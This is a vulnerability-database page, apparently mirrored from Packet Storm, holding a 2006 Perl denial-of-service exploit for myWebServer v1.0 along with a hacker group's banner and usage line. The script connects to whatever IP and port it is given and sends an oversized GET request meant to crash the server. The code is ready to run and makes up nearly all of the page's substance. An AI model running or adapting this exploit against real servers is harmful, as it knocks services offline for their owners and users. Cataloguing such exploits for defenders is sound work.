Lucene search
+L

myWebServer-1.0.txt

🗓️ 29 May 2006 00:00:00Reported by s3rv3r_hack3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Denial of Service exploit for myWebServer v1.

Code
`#!/usr/bin/perl  
#my Web Server << v-1.0 Denial of Service Exploit  
#vendor : Eitsop.s5.com  
use IO::Socket;  
use strict;  
  
my($socket) = "";  
  
if($socket = IO::Socket::INET->new(  
PeerAddr => $ARGV[0],  
PeerPort => $ARGV[1],  
Proto => "TCP"))  
{  
print "++++++++++++++++++++++++++++++\n";  
print "Connecting to $ARGV[0]:$ARGV[1] ...\n";  
print "++++++++++++++++++++++++++++++\n";  
print "Exploit Send successfuly!!\n";  
print "++++++++++++++++++++++++++++++\n";  
print $socket "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.0\r\n\r\n";  
close($socket);  
}  
else  
{  
print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";  
print " ___ ___ __ \n";  
print " / | \_____ ____ | | __ ___________________ \n";  
print "/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / \n";  
print "\ Y // __ \\ \___| <\ ___/| | \// / \n";  
print " \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ \n";  
print " \/ \/ \/ \/ \/ \/ \n";  
print " Iran Hackerz Security Team \n";  
print " WebSite's: www.hackerz.ir & www.h4ckerz.com \n";  
print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";  
print "[Usage]perl myws.pl <IP> <Port> \n";  
print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";  
print "[Status]Can Not Connect To >> $ARGV[0]:$ARGV[1] \n";  
print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";  
}  
#EoF  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 May 2006 00:00Current
7.4High risk
Vulners AI Score7.4
20